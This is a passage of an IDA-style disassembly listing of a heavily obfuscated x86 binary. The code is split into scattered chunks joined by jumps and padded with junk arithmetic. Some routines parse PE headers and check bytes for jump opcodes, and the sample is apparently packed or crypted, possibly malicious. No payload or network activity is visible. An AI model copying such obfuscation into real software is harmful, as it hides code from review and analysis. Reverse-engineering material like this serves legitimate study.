add eax, 4C448979h
loc_4261D5: ; CODE XREF: sub_424698:loc_424153�j
call sub_424877
push 94857662h
pop edx
and edx, 5930BFE2h
jmp loc_427657
; END OF FUNCTION CHUNK FOR sub_424698
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_57. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_4261EC: ; CODE XREF: hjohnhn9:00427E3A�j
jmp loc_425066
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427994
loc_4261F1: ; CODE XREF: sub_427994+10�j
jmp loc_4239EC
; END OF FUNCTION CHUNK FOR sub_427994
; ---------------------------------------------------------------------------
loc_4261F6: ; CODE XREF: hjohnhn9:0042841A�j
add ebp, edi
shl ecx, 6
jnp loc_42403E
jmp loc_426EA6
; ---------------------------------------------------------------------------
adc ecx, 110AAC48h
jmp loc_427850
; =============== S U B R O U T I N E =======================================
sub_426211 proc near ; CODE XREF: sub_423D1C+5�p
; sub_4260BD+CE8�j
; FUNCTION CHUNK AT 00423241 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424526 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004250CF SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042765C SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
push 7FDD7FB8h
pop edi
and edi, 82A2154Ch
test edi, 400000h
jmp loc_423241
sub_426211 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_71. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
mov edx, [esi]
jmp sub_425029
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_86. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BD2
loc_426235: ; CODE XREF: sub_425BD2:loc_428CAA�j
xchg ebp, [esp+4+var_4]
jmp loc_423771
; END OF FUNCTION CHUNK FOR sub_425BD2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42855B
loc_42623D: ; CODE XREF: sub_42855B�j
push ecx
mov ecx, ebp
xchg ecx, [esp+4+var_4]
mov ebp, esp
jmp loc_423320
; END OF FUNCTION CHUNK FOR sub_42855B
; ---------------------------------------------------------------------------
cmp ebx, 0D69F4B63h
jmp loc_427B6D
; ---------------------------------------------------------------------------
loc_426255: ; DATA XREF: sub_4250C3+3E9F�o
mov eax, [ebp-4]
add eax, 3Ch
mov eax, [eax]
add eax, [ebp-4]
add eax, 18h
jmp loc_423D33
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423CDB
loc_426268: ; CODE XREF: sub_423CDB:loc_4267FC�j
xor eax, eax
loc_42626A: ; CODE XREF: sub_42355C:loc_425E06�j
; sub_425029:loc_428823�j
jmp loc_424BB4
; END OF FUNCTION CHUNK FOR sub_423CDB
; =============== S U B R O U T I N E =======================================
sub_42626F proc near ; DATA XREF: sub_424A78+4116�o
; FUNCTION CHUNK AT 0042302C SIZE 00000005 BYTES
jz loc_4242D9
push ebp
mov eax, [ebp-20h]
call sub_426287
pop ecx
loc_42627F: ; CODE XREF: sub_427C9B+23�j
mov [ebp-20h], eax
jmp loc_42302C
sub_42626F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426287 proc near ; CODE XREF: sub_42626F+A�p
push ebp
mov ebp, esp
jmp sub_424A55
sub_426287 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426523
loc_42628F: ; CODE XREF: sub_426523+D�j
jno loc_42845E
idiv ecx
push ecx
push 6587844Bh
pop ecx
jmp loc_4290A3
; END OF FUNCTION CHUNK FOR sub_426523
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427A36
loc_4262A3: ; CODE XREF: sub_427A36+9�j
push ecx
cmp ds:dword_423940, 0
jz loc_427EAB
mov eax, ds:dword_423940
mov eax, [eax]
push offset sub_4262DA
jmp loc_42888D
; END OF FUNCTION CHUNK FOR sub_427A36
; =============== S U B R O U T I N E =======================================
sub_4262C2 proc near ; DATA XREF: sub_4263E3-1814�o
xor eax, eax
retn
sub_4262C2 endp
; =============== S U B R O U T I N E =======================================
sub_4262C5 proc near ; CODE XREF: sub_4279C8�p
; sub_4263E3+1B38�p ...
; FUNCTION CHUNK AT 00423288 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423466 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042389B SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00423B1F SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00423C0D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00423F0B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424ADE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424E63 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004251E6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004264E3 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004265F3 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042761C SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00427C18 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00428031 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00428B61 SIZE 0000000B BYTES
jo sub_4266B5
call sub_426671
loc_4262D0: ; CODE XREF: hjohnhn9:0042656E�j
jmp loc_4265F3
sub_4262C5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424EC9
loc_4262D5: ; CODE XREF: sub_424EC9+5�j
jmp loc_427E0A
; END OF FUNCTION CHUNK FOR sub_424EC9
; =============== S U B R O U T I N E =======================================
sub_4262DA proc near ; DATA XREF: sub_427A36-177E�o
mov ds:dword_423944, eax
xor eax, eax
push offset sub_4278EC
jmp nullsub_17
sub_4262DA endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426354
loc_4262EB: ; CODE XREF: sub_426354:loc_42323C�j
jnz loc_427B58
mov eax, [ebp-1Ch]
shl eax, 8
mov edx, [ebp-20h]
movzx edx, byte ptr [edx]
jmp loc_428B67
; ---------------------------------------------------------------------------
loc_426302: ; CODE XREF: sub_426354:loc_427A11�j
cmp dword ptr [ebp-1Ch], 0Fh
jnz loc_427B58
jmp loc_428388
; END OF FUNCTION CHUNK FOR sub_426354
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426708
loc_426311: ; CODE XREF: sub_426708:loc_426E5A�j
jz loc_4247A4
jmp loc_426947
; END OF FUNCTION CHUNK FOR sub_426708
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426671
loc_42631C: ; CODE XREF: sub_426671+122A�j
add ebp, eax
xchg edi, [esi]
jmp loc_423FCD
; END OF FUNCTION CHUNK FOR sub_426671
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4260BD
loc_426325: ; CODE XREF: sub_4260BD-16A5�j
xchg esi, eax
jmp loc_42604A
; END OF FUNCTION CHUNK FOR sub_4260BD
; ---------------------------------------------------------------------------
loc_42632C: ; CODE XREF: hjohnhn9:0042397F�j
xor eax, 0C53AEA7h
rol ebp, 1Ah
loc_426335: ; CODE XREF: hjohnhn9:loc_427208�j
mov eax, [ebp-4]
xor edx, edx
call sub_425E94
; START OF FUNCTION CHUNK FOR sub_426CC8
loc_42633F: ; CODE XREF: sub_426CC8+2EB�j
jmp loc_4286BD
; END OF FUNCTION CHUNK FOR sub_426CC8
; ---------------------------------------------------------------------------
loc_426344: ; CODE XREF: hjohnhn9:00426F3F�j
jmp loc_425BE0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_92. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4247F4
loc_42634A: ; CODE XREF: sub_4247F4+429E�j
jmp loc_4263F6
; END OF FUNCTION CHUNK FOR sub_4247F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424E4F
loc_42634F: ; CODE XREF: sub_424E4F+9�j
jmp loc_4244D3
; END OF FUNCTION CHUNK FOR sub_424E4F
; =============== S U B R O U T I N E =======================================
sub_426354 proc near ; CODE XREF: hjohnhn9:0042738D�j
; sub_426354:loc_42909E�p
; FUNCTION CHUNK AT 0042323C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423350 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00423451 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004238BA SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00424B60 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00424D6D SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00425270 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00425C05 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00425E20 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00425EC5 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00425F00 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004262EB SIZE 00000026 BYTES
; FUNCTION CHUNK AT 00426938 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00426E07 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004275D2 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00427927 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427A11 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00427AB5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428388 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004283BF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042854C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004285DA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042875B SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004287E0 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00428BAC SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042909E SIZE 0000000A BYTES
xchg edi, [esp+0]
pop edi
jnb loc_424B60
cmp dword ptr [ebp-1Ch], 66h
push offset sub_424B4A
jmp loc_4285DA
sub_426354 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42636C proc near ; CODE XREF: sub_42325E+B9E�p
; hjohnhn9:004281B4�j
; FUNCTION CHUNK AT 00423671 SIZE 0000001C BYTES
xchg ecx, [esp+0]
pop ecx
push ecx
push 0F5848676h
pop ecx
jmp loc_423671
sub_42636C endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_23. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
cmp edx, 84014F17h
jmp loc_4267EC
; ---------------------------------------------------------------------------
loc_426388: ; CODE XREF: hjohnhn9:loc_4270CA�j
test eax, 0A07829E3h
jmp loc_427763
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427AC0
loc_426393: ; CODE XREF: sub_427AC0+A�j
pop ecx
xor ecx, 0FA943B2h
add ecx, 0CC3B5D4Bh
loc_4263A0: ; CODE XREF: sub_425BD2-1CA0�j
xor ecx, 4FB64A39h
xchg ecx, [esp+0]
lea eax, [ebp-34h]
jmp loc_424251
; END OF FUNCTION CHUNK FOR sub_427AC0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4279C0
loc_4263B1: ; CODE XREF: sub_4279C0-3545�j
push edi
mov edi, edx
xchg edi, [esp+4+var_4]
push ebp
mov ebp, eax
xchg ebp, [esp+8+var_8]
call sub_4279C0
jmp loc_427FF5
; END OF FUNCTION CHUNK FOR sub_4279C0
; =============== S U B R O U T I N E =======================================
sub_4263C7 proc near ; CODE XREF: hjohnhn9:00427224�j
; hjohnhn9:00427B83�p
xchg esi, [esp+0]
pop esi
mov eax, [ebp-4]
call sub_428CE7
sub_4263C7 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_427486
loc_4263D3: ; CODE XREF: sub_427486:loc_424E99�j
jmp nullsub_27
; END OF FUNCTION CHUNK FOR sub_427486
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424C5F
loc_4263D8: ; CODE XREF: sub_424C5F+11�j
jmp nullsub_73
; END OF FUNCTION CHUNK FOR sub_424C5F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_9. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423B05
loc_4263DE: ; CODE XREF: sub_423B05+15B7�j
jmp loc_428D80
; END OF FUNCTION CHUNK FOR sub_423B05
; =============== S U B R O U T I N E =======================================
sub_4263E3 proc near ; DATA XREF: sub_428F0B-596D�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004248A6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00424BCE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00425056 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004250A8 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004265E9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426C9B SIZE 0000002D BYTES
; FUNCTION CHUNK AT 00427F10 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00427FED SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00428A14 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004290A8 SIZE 0000000A BYTES
mov eax, ds:dword_42339C
or eax, eax
jnz loc_427FED
jmp loc_4248A6
sub_4263E3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4247F4
loc_4263F6: ; CODE XREF: sub_4247F4:loc_42634A�j
mov [esi], eax
pop esi
mov eax, [ebp-4]
pop ecx
pop ebp
retn 4
; END OF FUNCTION CHUNK FOR sub_4247F4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_94. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424564
loc_426402: ; CODE XREF: sub_424564:loc_427F75�j
cmp ds:dword_4252DC[eax*4], 0
jz loc_42755C
mov eax, [ebp+var_4]
cmp byte ptr [eax], 0CFh
jz loc_427555
mov eax, [ebp+var_4]
cmp byte ptr [eax], 0E9h
jz loc_427555
jmp loc_427FC9
; END OF FUNCTION CHUNK FOR sub_424564
; ---------------------------------------------------------------------------
loc_42642D: ; CODE XREF: hjohnhn9:0042425C�j
and ecx, 695284E5h
; START OF FUNCTION CHUNK FOR sub_42466E
loc_426433: ; CODE XREF: sub_42466E:loc_42424B�j
add ebx, 49588021h
add eax, ebx
pop ebx
mov [ebp-4], eax
mov eax, [ebp-10h]
test eax, eax
jmp loc_425D3D
; END OF FUNCTION CHUNK FOR sub_42466E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427DE6
loc_426449: ; CODE XREF: sub_427DE6:loc_425F06�j
push 0
call sub_424AAE
xor eax, [ebp-8]
push offset loc_427CD0
jmp loc_4264B2
; END OF FUNCTION CHUNK FOR sub_427DE6
; =============== S U B R O U T I N E =======================================
sub_42645D proc near ; CODE XREF: sub_423B05:loc_425252�p
; hjohnhn9:00425F7C�j
; FUNCTION CHUNK AT 0042871E SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
push eax
ror eax, 11h
push offset sub_424831
jmp loc_42871E
sub_42645D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424698
loc_42646F: ; CODE XREF: sub_424698:loc_42469E�j
push ecx
jmp loc_42893A
; END OF FUNCTION CHUNK FOR sub_424698
; =============== S U B R O U T I N E =======================================
sub_426475 proc near ; DATA XREF: sub_4275B2+E�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423027 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004231C3 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004234D8 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00425B6B SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00425E69 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042602D SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00426E9B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00427EA1 SIZE 00000005 BYTES
call sub_424AAE
xor eax, [ebp-8]
mov byte ptr [eax], 5Bh
call sub_424AAE
xor eax, [ebp-8]
inc eax
mov edx, [ebp-4]
jmp loc_423027
sub_426475 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424819
loc_426491: ; CODE XREF: sub_424819:loc_426A03�j
; hjohnhn9:00428AD3�j
xor edx, 75C89949h
add edx, 822762DFh
xchg edx, [esp-4+arg_0]
push eax
pushf
push 1C160C50h
jmp loc_423394
; END OF FUNCTION CHUNK FOR sub_424819
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_4264AC proc near ; CODE XREF: sub_428183:loc_42335C�j
retn
sub_4264AC endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426708
loc_4264AD: ; CODE XREF: sub_426708+D�j
jmp loc_4261BC
; END OF FUNCTION CHUNK FOR sub_426708
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427DE6
loc_4264B2: ; CODE XREF: sub_427DE6-198E�j
jmp nullsub_41
; END OF FUNCTION CHUNK FOR sub_427DE6
; ---------------------------------------------------------------------------
loc_4264B7: ; CODE XREF: hjohnhn9:00425D98�j
jmp loc_428922
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427D9D
loc_4264BC: ; CODE XREF: sub_427D9D:loc_42838D�j
mov edx, [edx-8]
or edx, 40h
or eax, edx
mov edx, [ebp+8]
mov [edx-8], eax
jmp loc_423F3D
; END OF FUNCTION CHUNK FOR sub_427D9D
; =============== S U B R O U T I N E =======================================
sub_4264CF proc near ; CODE XREF: sub_4251D3+9�p
; hjohnhn9:00428901�j
; FUNCTION CHUNK AT 00427392 SIZE 00000015 BYTES
xchg ebx, [esp+0]
pop ebx
mov eax, ds:dword_428AE4
call sub_427486
loc_4264DE: ; CODE XREF: sub_424377+3414�j
jmp loc_427392
sub_4264CF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4262C5
loc_4264E3: ; CODE XREF: sub_4262C5-26B0�j
rol eax, 12h
loc_4264E6: ; CODE XREF: sub_4262C5:loc_428031�j
call sub_426CE6
loc_4264EB: ; CODE XREF: sub_428D64-5EC�j
jmp loc_427C18
; END OF FUNCTION CHUNK FOR sub_4262C5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C98
loc_4264F0: ; CODE XREF: sub_425C98+7�j
jmp loc_42877D
; END OF FUNCTION CHUNK FOR sub_425C98
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424631
loc_4264F5: ; CODE XREF: sub_424631-163�j
jmp loc_424C46
; END OF FUNCTION CHUNK FOR sub_424631
; =============== S U B R O U T I N E =======================================
sub_4264FA proc near ; CODE XREF: sub_426A78-4F5�p
; hjohnhn9:004268AE�j
; FUNCTION CHUNK AT 004248D0 SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
call sub_4279ED
push eax
ror eax, 9
mov ds:dword_428380, eax
jmp loc_4248D0
sub_4264FA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
jle loc_428B67
and ebx, 0D4E35CF9h
jmp sub_423369
; =============== S U B R O U T I N E =======================================
sub_426523 proc near ; CODE XREF: hjohnhn9:004249F7�j
; sub_425B34+A�p
; FUNCTION CHUNK AT 0042628F SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042845E SIZE 0000000F BYTES
xchg esi, [esp+0]
pop esi
mov eax, [ebp-8]
mov ecx, 0Ah
cdq
jmp loc_42628F
sub_426523 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424631
loc_426535: ; CODE XREF: sub_424631:loc_424CAA�j
cmp dword ptr [ebp-14h], 6
setz al
call sub_42392D
pop ecx
jmp loc_426E35
; END OF FUNCTION CHUNK FOR sub_424631
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424564
loc_426547: ; CODE XREF: sub_424564+8BB�j
jz loc_427555
; END OF FUNCTION CHUNK FOR sub_424564
; START OF FUNCTION CHUNK FOR sub_426C09
loc_42654D: ; CODE XREF: sub_426C09:loc_428F8E�j
mov eax, [ebp-4]
cmp byte ptr [eax], 0E9h
jz loc_427555
; END OF FUNCTION CHUNK FOR sub_426C09
; START OF FUNCTION CHUNK FOR sub_4284CB
loc_426559: ; CODE XREF: sub_4284CB:loc_427FC9�j
mov eax, [ebp-4]
loc_42655C: ; CODE XREF: sub_427564:loc_428906�j
jmp loc_423C85
; END OF FUNCTION CHUNK FOR sub_4284CB
; ---------------------------------------------------------------------------
loc_426561: ; DATA XREF: sub_428309+6�o
pop ebp
push 464D8703h
pop eax
sub eax, 0C8CE68BBh
jmp loc_4262D0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A78
loc_426573: ; CODE XREF: sub_426A78+2468�j
pop edi
push 0EC8CA081h
loc_426579: ; CODE XREF: sub_426A78:loc_423217�j
call sub_424877
mov edx, 8D40711Dh
call sub_4264FA
loc_426588: ; CODE XREF: sub_42841F-916�j
jg loc_423041
loc_42658E: ; CODE XREF: sub_42841F:loc_423D11�j
push ebp
push esi
push edi
push ebx
jmp loc_4233C8
; END OF FUNCTION CHUNK FOR sub_426A78
; ---------------------------------------------------------------------------
loc_426597: ; CODE XREF: hjohnhn9:004243CF�j
jnp loc_426B63
mov [ebp+0], eax
; =============== S U B R O U T I N E =======================================
sub_4265A0 proc near ; CODE XREF: sub_423D67-B55�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004270C5 SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
add eax, 0BAC28E35h
xchg eax, [esp-4+arg_0]
jmp loc_4270C5
sub_4265A0 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_30. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424E4F
loc_4265B3: ; CODE XREF: sub_424E4F:loc_42872A�j
jmp loc_428B82
; END OF FUNCTION CHUNK FOR sub_424E4F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BD2
loc_4265B8: ; CODE XREF: sub_425BD2+2B37�j
jmp loc_427253
; END OF FUNCTION CHUNK FOR sub_425BD2
; ---------------------------------------------------------------------------
locret_4265BD: ; CODE XREF: hjohnhn9:loc_424723�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428965
loc_4265BE: ; CODE XREF: sub_428965+10�j
jmp nullsub_69
; END OF FUNCTION CHUNK FOR sub_428965
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42363F
loc_4265C3: ; CODE XREF: sub_42363F+198C�j
jmp loc_426FB8
; END OF FUNCTION CHUNK FOR sub_42363F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4231AD
loc_4265C8: ; CODE XREF: sub_4231AD+1B52�j
jmp loc_427FA4
; END OF FUNCTION CHUNK FOR sub_4231AD
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4265CD proc near ; CODE XREF: hjohnhn9:00426AB9�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 004232EB SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042352D SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004235F0 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042403E SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00424449 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00424737 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00425D6F SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00425F4D SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00426B68 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427A9C SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00427FAF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428576 SIZE 00000006 BYTES
push ebp
mov ebp, esp
push edx
push ecx
pop edx
xchg edx, [esp+0]
mov esp, ebp
jmp loc_424737
sub_4265CD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
sub eax, 0B756ED04h
jmp sub_426961
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_36. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4263E3
loc_4265E9: ; CODE XREF: sub_4263E3+1B40�j
jmp loc_424BCE
; END OF FUNCTION CHUNK FOR sub_4263E3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424877
loc_4265EE: ; CODE XREF: sub_424877-22B�j
call sub_428D49
; END OF FUNCTION CHUNK FOR sub_424877
; START OF FUNCTION CHUNK FOR sub_4262C5
loc_4265F3: ; CODE XREF: sub_4262C5:loc_4262D0�j
or eax, 20B003h
test eax, 40000h
jmp loc_428031
; END OF FUNCTION CHUNK FOR sub_4262C5
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426604 proc near ; CODE XREF: sub_426708�j
; FUNCTION CHUNK AT 00428C3F SIZE 00000005 BYTES
push ebp
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
call sub_425DE4
loc_426610: ; DATA XREF: sub_424631-14AE�o
or dword ptr [eax-8], 8
jmp loc_428C3F
sub_426604 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424631
loc_426619: ; CODE XREF: sub_424631+3178�j
; sub_424631+3185�j
jnb loc_423EE2
cmp dword ptr [ebp-10h], 0
jnz loc_42516C
mov eax, [ebp+8]
push eax
jmp loc_424CAA
; END OF FUNCTION CHUNK FOR sub_424631
; ---------------------------------------------------------------------------
loc_426632: ; CODE XREF: hjohnhn9:00427B75�j
jns loc_426796
; =============== S U B R O U T I N E =======================================
sub_426638 proc near ; CODE XREF: sub_423BC3:loc_423388�p
; FUNCTION CHUNK AT 004230FD SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00427F44 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427F5F SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
push edx
push 2625621Bh
pop edx
jmp loc_427F5F
sub_426638 endp
; ---------------------------------------------------------------------------
and edi, eax
jmp loc_423AF1
; ---------------------------------------------------------------------------
locret_42664F: ; CODE XREF: hjohnhn9:00428BA5�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424631
loc_426650: ; CODE XREF: sub_424631-A7E�j
jmp loc_424314
; END OF FUNCTION CHUNK FOR sub_424631
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424161
loc_426655: ; CODE XREF: sub_424161-603�j
mov eax, ebp
pop ebp
and eax, 43C3D247h
rol eax, 0Ah
add eax, 58B6A62Ch
call sub_427C9B
; END OF FUNCTION CHUNK FOR sub_424161
; START OF FUNCTION CHUNK FOR sub_424B4A
loc_42666C: ; CODE XREF: sub_424B4A+11�j
jmp loc_425ED0
; END OF FUNCTION CHUNK FOR sub_424B4A
; =============== S U B R O U T I N E =======================================
sub_426671 proc near ; CODE XREF: hjohnhn9:00424096�j
; sub_4262C5+6�p
; FUNCTION CHUNK AT 0042316A SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00423FCD SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00426019 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042631C SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00427895 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428551 SIZE 0000000A BYTES
xchg edi, [esp+0]
pop edi
push ebx
mov ebx, ebp
xchg ebx, [esp+0]
mov ebp, esp
push ecx
mov esp, ebp
jmp loc_426019
sub_426671 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42387A
loc_426685: ; CODE XREF: sub_42387A:loc_4270DD�j
; sub_423444+3CB8�j
rol ecx, 1Ch
add ecx, 0AE37F7A3h
xchg ecx, [esp+0]
jmp sub_4278DC
; END OF FUNCTION CHUNK FOR sub_42387A
; ---------------------------------------------------------------------------
push eax
ror eax, 11h
mov ds:dword_428B04, eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BD2
loc_4266A1: ; CODE XREF: sub_425BD2+1689�j
jmp nullsub_61
; ---------------------------------------------------------------------------
loc_4266A6: ; CODE XREF: sub_425BD2-1433�j
jmp nullsub_57
; END OF FUNCTION CHUNK FOR sub_425BD2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4269BD
loc_4266AB: ; CODE XREF: sub_4269BD-289B�j
jmp nullsub_22
; END OF FUNCTION CHUNK FOR sub_4269BD
; ---------------------------------------------------------------------------
loc_4266B0: ; CODE XREF: hjohnhn9:00424112�j
jmp loc_428FDB
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4266B5 proc near ; CODE XREF: sub_4262C5�j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00424913 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00425D55 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426B04 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428A6C SIZE 00000012 BYTES
push ebp
mov ebp, esp
push esi
jmp loc_425D55
